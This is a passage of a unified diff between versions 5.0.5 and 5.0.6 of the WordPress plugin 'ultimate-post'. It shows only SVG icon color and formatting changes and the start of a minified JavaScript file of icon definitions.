-<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 40 38" style="enable-background:new 0 0 40 38" xml:space="preserve"><style>.st0{fill:#037fff}</style><path class="st0" d="m25.7 23.7-3-3H5c-1.1 0-2-.9-2-2V5c0-1.1.9-2 2-2h26.3c1.1 0 2 .9 2 2v6.4l3 3V5c0-2.8-2.2-5-5-5H5C2.2 0 0 2.2 0 5v13.7c0 2.7 2.2 5 5 5h20.7zM1.5 27.8h18.6v3H1.5zM1.5 35h36.1v3H1.5z"/><path class="st0" d="M21.2 8.8c.1-.1.3-.2.4-.3.2-.1.3-.2.5-.3.4-.1.8-.2 1.2-.2.8 0 1.7.3 2.3 1l3 3c.4-.1.8-.1 1.2-.1.4 0 .7 0 1 .1l-4.1-4.1c-1.6-1.6-4-1.9-5.9-.8-.2.1-.3.2-.5.3-.1.1-.3.2-.4.3l-.1.1c-.9.9-1.4 2.1-1.4 3.4 0 1.3.5 2.5 1.4 3.4l5.3 5.3c.2.2.4.4.6.5.8.6 1.8.9 2.8.9h.3c1.2-.1 2.3-.6 3.2-1.4l.1-.1c.1-.1.2-.3.3-.4.1-.1.2-.3.3-.5.2-.3.3-.6.4-.9l-1.4-1.4c0 .4-.1.8-.2 1.1-.1.2-.2.3-.3.5-.1.2-.2.3-.3.4l-.1.1c-.6.6-1.4 1-2.3 1-.6 0-1.2-.2-1.7-.5-.2-.1-.5-.3-.6-.5l-1.4-1.4-3.8-3.7c-.6-.6-1-1.4-1-2.3 0-.9.3-1.7 1-2.3l.2-.2z"/><path class="st0" d="m38.6 19.6-5.3-5.3c-.2-.2-.4-.4-.6-.5-.8-.6-1.8-.9-2.8-.9h-.3c-1.2.1-2.2.5-3.1 1.3l-.1.1c-.1.1-.2.2-.2.3-.1.1-.2.3-.3.4-.3.4-.5.8-.6 1.2l1.4 1.4c0-.5.2-1 .4-1.4.1-.2.2-.3.3-.5.1-.1.2-.2.2-.3l.1-.1c.6-.5 1.4-.8 2.2-.8.6 0 1.2.2 1.7.5.2.1.5.3.7.5l1.4 1.4 3.9 3.9c.6.6 1 1.4 1 2.3 0 .8-.3 1.6-.8 2.2l-.1.1c-.1.1-.2.2-.3.2-.1.1-.3.2-.5.3-1.2.7-2.8.5-3.9-.5l-3-3c-.4.1-.8.1-1.2.1-.3 0-.7 0-1-.1l4.1 4.1c.9.9 2.2 1.4 3.4 1.4 1 0 1.9-.3 2.8-.8.2-.1.3-.2.4-.3.1-.1.2-.2.3-.2l.1-.1c.8-.9 1.3-2.1 1.3-3.3-.2-1.4-.7-2.7-1.6-3.6z"/></svg>
\ No newline at end of file
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 40 38"
+    style="enable-background:new 0 0 40 38" xml:space="preserve"><style>.st0{fill:#1F66FF}</style><path class="st0" d="m25.7 23.7-3-3H5c-1.1 0-2-.9-2-2V5c0-1.1.9-2 2-2h26.3c1.1 0 2 .9 2 2v6.4l3 3V5c0-2.8-2.2-5-5-5H5C2.2 0 0 2.2 0 5v13.7c0 2.7 2.2 5 5 5h20.7zM1.5 27.8h18.6v3H1.5zM1.5 35h36.1v3H1.5z"/><path class="st0" d="M21.2 8.8c.1-.1.3-.2.4-.3.2-.1.3-.2.5-.3.4-.1.8-.2 1.2-.2.8 0 1.7.3 2.3 1l3 3c.4-.1.8-.1 1.2-.1.4 0 .7 0 1 .1l-4.1-4.1c-1.6-1.6-4-1.9-5.9-.8-.2.1-.3.2-.5.3-.1.1-.3.2-.4.3l-.1.1c-.9.9-1.4 2.1-1.4 3.4 0 1.3.5 2.5 1.4 3.4l5.3 5.3c.2.2.4.4.6.5.8.6 1.8.9 2.8.9h.3c1.2-.1 2.3-.6 3.2-1.4l.1-.1c.1-.1.2-.3.3-.4.1-.1.2-.3.3-.5.2-.3.3-.6.4-.9l-1.4-1.4c0 .4-.1.8-.2 1.1-.1.2-.2.3-.3.5-.1.2-.2.3-.3.4l-.1.1c-.6.6-1.4 1-2.3 1-.6 0-1.2-.2-1.7-.5-.2-.1-.5-.3-.6-.5l-1.4-1.4-3.8-3.7c-.6-.6-1-1.4-1-2.3 0-.9.3-1.7 1-2.3l.2-.2z"/><path class="st0" d="m38.6 19.6-5.3-5.3c-.2-.2-.4-.4-.6-.5-.8-.6-1.8-.9-2.8-.9h-.3c-1.2.1-2.2.5-3.1 1.3l-.1.1c-.1.1-.2.2-.2.3-.1.1-.2.3-.3.4-.3.4-.5.8-.6 1.2l1.4 1.4c0-.5.2-1 .4-1.4.1-.2.2-.3.3-.5.1-.1.2-.2.2-.3l.1-.1c.6-.5 1.4-.8 2.2-.8.6 0 1.2.2 1.7.5.2.1.5.3.7.5l1.4 1.4 3.9 3.9c.6.6 1 1.4 1 2.3 0 .8-.3 1.6-.8 2.2l-.1.1c-.1.1-.2.2-.3.2-.1.1-.3.2-.5.3-1.2.7-2.8.5-3.9-.5l-3-3c-.4.1-.8.1-1.2.1-.3 0-.7 0-1-.1l4.1 4.1c.9.9 2.2 1.4 3.4 1.4 1 0 1.9-.3 2.8-.8.2-.1.3-.2.4-.3.1-.1.2-.2.3-.2l.1-.1c.8-.9 1.3-2.1 1.3-3.3-.2-1.4-.7-2.7-1.6-3.6z"/></svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/column.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/column.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/column.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/column.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,7 +1,13 @@
 <svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50">
   <g id="Group_1989" data-name="Group 1989" transform="translate(-2289 -4479)">
-    <path id="Path_320" data-name="Path 320" d="M10.808,47.089h-7.9V2.911h7.9ZM12.2,0H1.518A1.518,1.518,0,0,0,0,1.518V48.482A1.518,1.518,0,0,0,1.518,50H12.2a1.518,1.518,0,0,0,1.518-1.518V1.518A1.518,1.518,0,0,0,12.2,0" transform="translate(2289 4479)" fill="#037fff"/>
-    <path id="Path_321" data-name="Path 321" d="M28.949,47.089h-7.9V2.911h7.9ZM30.342,0H19.659a1.518,1.518,0,0,0-1.518,1.518V48.482A1.518,1.518,0,0,0,19.659,50H30.342a1.518,1.518,0,0,0,1.518-1.518V1.518A1.518,1.518,0,0,0,30.342,0" transform="translate(2289 4479)" fill="#037fff"/>
-    <path id="Path_322" data-name="Path 322" d="M47.089,47.089h-7.9V2.911h7.9ZM48.482,0H37.8a1.518,1.518,0,0,0-1.518,1.518V48.482A1.518,1.518,0,0,0,37.8,50H48.482A1.518,1.518,0,0,0,50,48.482V1.518A1.518,1.518,0,0,0,48.482,0" transform="translate(2289 4479)" fill="#037fff"/>
+    <path id="Path_320" data-name="Path 320"
+      d="M10.808,47.089h-7.9V2.911h7.9ZM12.2,0H1.518A1.518,1.518,0,0,0,0,1.518V48.482A1.518,1.518,0,0,0,1.518,50H12.2a1.518,1.518,0,0,0,1.518-1.518V1.518A1.518,1.518,0,0,0,12.2,0"
+      transform="translate(2289 4479)" fill="#1F66FF" />
+    <path id="Path_321" data-name="Path 321"
+      d="M28.949,47.089h-7.9V2.911h7.9ZM30.342,0H19.659a1.518,1.518,0,0,0-1.518,1.518V48.482A1.518,1.518,0,0,0,19.659,50H30.342a1.518,1.518,0,0,0,1.518-1.518V1.518A1.518,1.518,0,0,0,30.342,0"
+      transform="translate(2289 4479)" fill="#1F66FF" />
+    <path id="Path_322" data-name="Path 322"
+      d="M47.089,47.089h-7.9V2.911h7.9ZM48.482,0H37.8a1.518,1.518,0,0,0-1.518,1.518V48.482A1.518,1.518,0,0,0,37.8,50H48.482A1.518,1.518,0,0,0,50,48.482V1.518A1.518,1.518,0,0,0,48.482,0"
+      transform="translate(2289 4479)" fill="#1F66FF" />
   </g>
-</svg>
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/list_menu.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/list_menu.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/list_menu.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/list_menu.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,11 +1,12 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-  <g clip-path="url(#a)" stroke="#037FFF" stroke-width="1.5">
-    <path d="M23 4a3 3 0 0 0-3-3H4a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h19V4ZM6 20a3 3 0 0 0 3 3h11a3 3 0 0 0 3-3V9H6v11Z"/>
-    <path d="M14.5 3.5 17 6l2.5-2.5M10 19h9M10 16h9M10 13h9"/>
+  <g clip-path="url(#a)" stroke="#1F66FF" stroke-width="1.5">
+    <path
+      d="M23 4a3 3 0 0 0-3-3H4a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h19V4ZM6 20a3 3 0 0 0 3 3h11a3 3 0 0 0 3-3V9H6v11Z" />
+    <path d="M14.5 3.5 17 6l2.5-2.5M10 19h9M10 16h9M10 13h9" />
   </g>
   <defs>
     <clipPath id="a">
-      <path fill="#fff" d="M0 0h24v24H0z"/>
+      <path fill="#fff" d="M0 0h24v24H0z" />
     </clipPath>
   </defs>
 </svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/menu_item.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/menu_item.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/menu_item.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/menu_item.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,4 +1,5 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-  <path d="M14.5 10.5 17 13l1.25-1.25 1.25-1.25M4 12h8" stroke="#037FFF" stroke-width="1.5"/>
-  <path d="M1 7a3 3 0 0 1 3-3h16a3 3 0 0 1 3 3v10a3 3 0 0 1-3 3H4a3 3 0 0 1-3-3V7Z" stroke="#037FFF" stroke-width="1.5"/>
+  <path d="M14.5 10.5 17 13l1.25-1.25 1.25-1.25M4 12h8" stroke="#1F66FF" stroke-width="1.5" />
+  <path d="M1 7a3 3 0 0 1 3-3h16a3 3 0 0 1 3 3v10a3 3 0 0 1-3 3H4a3 3 0 0 1-3-3V7Z" stroke="#1F66FF"
+    stroke-width="1.5" />
 </svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/menu.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/menu.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/menu/menu.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/menu/menu.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,5 +1,5 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-  <path d="M6 12h5M6 7h12M6 17h12" stroke="#037FFF" stroke-width="1.5"/>
-  <rect x="1" y="1" width="22" height="22" rx="3" stroke="#037FFF" stroke-width="1.5"/>
-  <path d="m13 10.5 2.5 2.5 1.25-1.25L18 10.5" stroke="#037FFF" stroke-width="1.5"/>
+  <path d="M6 12h5M6 7h12M6 17h12" stroke="#1F66FF" stroke-width="1.5" />
+  <rect x="1" y="1" width="22" height="22" rx="3" stroke="#1F66FF" stroke-width="1.5" />
+  <path d="m13 10.5 2.5 2.5 1.25-1.25L18 10.5" stroke="#1F66FF" stroke-width="1.5" />
 </svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/pagination.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/pagination.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/pagination.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/pagination.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,8 +1,18 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-    <path d="M6.12988 18L1.61988 13.49C0.799883 12.67 0.799883 11.33 1.61988 10.51L6.12988 6L7.16988 7.04L2.64988 11.55C2.39988 11.8 2.39988 12.2 2.64988 12.45L7.15988 16.96L6.11988 18H6.12988Z" fill="#037FFF"/>
-    <path d="M17.8701 18L16.8301 16.96L21.3401 12.45C21.4601 12.33 21.5301 12.17 21.5301 12C21.5301 11.83 21.4601 11.67 21.3401 11.55L16.8301 7.04L17.8701 6L22.3801 10.51C23.2001 11.33 23.2001 12.67 22.3801 13.49L17.8701 18Z" fill="#037FFF"/>
-    <path d="M7.5199 13.37C8.27653 13.37 8.8899 12.7566 8.8899 12C8.8899 11.2434 8.27653 10.63 7.5199 10.63C6.76327 10.63 6.1499 11.2434 6.1499 12C6.1499 12.7566 6.76327 13.37 7.5199 13.37Z" fill="#037FFF"/>
-    <path d="M11.9999 13.37C12.7565 13.37 13.3699 12.7566 13.3699 12C13.3699 11.2434 12.7565 10.63 11.9999 10.63C11.2433 10.63 10.6299 11.2434 10.6299 12C10.6299 12.7566 11.2433 13.37 11.9999 13.37Z" fill="#037FFF"/>
-    <path d="M16.4799 13.37C17.2365 13.37 17.8499 12.7566 17.8499 12C17.8499 11.2434 17.2365 10.63 16.4799 10.63C15.7232 10.63 15.1099 11.2434 15.1099 12C15.1099 12.7566 15.7232 13.37 16.4799 13.37Z" fill="#037FFF"/>
-    </svg>
+    <path
+        d="M6.12988 18L1.61988 13.49C0.799883 12.67 0.799883 11.33 1.61988 10.51L6.12988 6L7.16988 7.04L2.64988 11.55C2.39988 11.8 2.39988 12.2 2.64988 12.45L7.15988 16.96L6.11988 18H6.12988Z"
+        fill="#1F66FF" />
+    <path
+        d="M17.8701 18L16.8301 16.96L21.3401 12.45C21.4601 12.33 21.5301 12.17 21.5301 12C21.5301 11.83 21.4601 11.67 21.3401 11.55L16.8301 7.04L17.8701 6L22.3801 10.51C23.2001 11.33 23.2001 12.67 22.3801 13.49L17.8701 18Z"
+        fill="#1F66FF" />
+    <path
+        d="M7.5199 13.37C8.27653 13.37 8.8899 12.7566 8.8899 12C8.8899 11.2434 8.27653 10.63 7.5199 10.63C6.76327 10.63 6.1499 11.2434 6.1499 12C6.1499 12.7566 6.76327 13.37 7.5199 13.37Z"
+        fill="#1F66FF" />
+    <path
+        d="M11.9999 13.37C12.7565 13.37 13.3699 12.7566 13.3699 12C13.3699 11.2434 12.7565 10.63 11.9999 10.63C11.2433 10.63 10.6299 11.2434 10.6299 12C10.6299 12.7566 11.2433 13.37 11.9999 13.37Z"
+        fill="#1F66FF" />
+    <path
+        d="M16.4799 13.37C17.2365 13.37 17.8499 12.7566 17.8499 12C17.8499 11.2434 17.2365 10.63 16.4799 10.63C15.7232 10.63 15.1099 11.2434 15.1099 12C15.1099 12.7566 15.7232 13.37 16.4799 13.37Z"
+        fill="#1F66FF" />
+</svg>
     
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/social_icons.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/social_icons.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/social_icons.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/social_icons.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,9 +1,10 @@
 <?xml version="1.0" encoding="utf-8"?>
 <!-- Generator: Adobe Illustrator 28.3.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
-<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
-	 viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg"
+	xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
+	viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
 <style type="text/css">
-	.st0{fill:#037FFF;}
+	.st0{fill:#1F66FF;}
 </style>
 <path class="st0" d="M43.5,18.5c-1.3,0-2.5,0.4-3.5,1L30.5,10c0.6-1,1-2.2,1-3.5C31.5,2.9,28.6,0,25,0s-6.5,2.9-6.5,6.5
 	c0,1.3,0.4,2.5,1,3.5L10,19.5c-1-0.6-2.2-1-3.5-1C2.9,18.5,0,21.4,0,25s2.9,6.5,6.5,6.5c1.3,0,2.5-0.4,3.5-1l9.5,9.5
@@ -13,4 +14,4 @@
 	S27,10.1,25,10.1s-3.6-1.6-3.6-3.6S23,2.9,25,2.9z M2.9,25c0-2,1.6-3.6,3.6-3.6s3.6,1.6,3.6,3.6s-1.6,3.6-3.6,3.6S2.9,27,2.9,25z
 	 M25,47.1c-2,0-3.6-1.6-3.6-3.6s1.6-3.6,3.6-3.6s3.6,1.6,3.6,3.6S27,47.1,25,47.1z M43.5,28.6c-2,0-3.6-1.6-3.6-3.6s1.6-3.6,3.6-3.6
 	s3.6,1.6,3.6,3.6S45.5,28.6,43.5,28.6z"/>
-</svg>
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/social.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/social.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/social.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/social.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,9 +1,10 @@
 <?xml version="1.0" encoding="utf-8"?>
 <!-- Generator: Adobe Illustrator 28.3.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
-<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
-	 viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg"
+	xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
+	viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
 <style type="text/css">
-	.st0{fill:#037FFF;}
+	.st0{fill:#1F66FF;}
 </style>
 <path class="st0" d="M39.5,14.5c-1.3,0-2.6,0.3-3.8,0.7L30.5,10c0.6-1,1-2.2,1-3.5C31.5,2.9,28.6,0,25,0s-6.5,2.9-6.5,6.5
 	c0,1.3,0.4,2.5,1,3.5L10,19.5c-1-0.6-2.2-1-3.5-1C2.9,18.5,0,21.4,0,25s2.9,6.5,6.5,6.5c1.3,0,2.5-0.4,3.5-1l9.5,9.5
@@ -14,4 +15,4 @@
 	s-2.5,0.4-3.5,1l-9.5-9.5c0.6-1,1-2.2,1-3.5c0-1.3-0.4-2.5-1-3.5l9.5-9.5c1,0.6,2.2,1,3.5,1c1.3,0,2.5-0.4,3.5-1l4.7,4.7
 	c-2.5,1.9-4.1,4.9-4.1,8.3s1.6,6.3,4.1,8.3L28.5,37.9z M39.5,31.5c-3.6,0-6.5-2.9-6.5-6.5s2.9-6.5,6.5-6.5c3.6,0,6.5,2.9,6.5,6.5
 	S43.1,31.5,39.5,31.5z"/>
-</svg>
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/editor.blocks.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/editor.blocks.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/editor.blocks.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/editor.blocks.js	2026-02-02 04:04:06.000000000 +0000
@@ -1,2 +1,2 @@
 /*! For license information please see editor.blocks.js.LICENSE.txt */
-(()=>{var e={34528:(e,t,l)=>{"use strict";l.d(t,{c:()=>a});var o=l(67294);const a={add_plus_shopping_cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 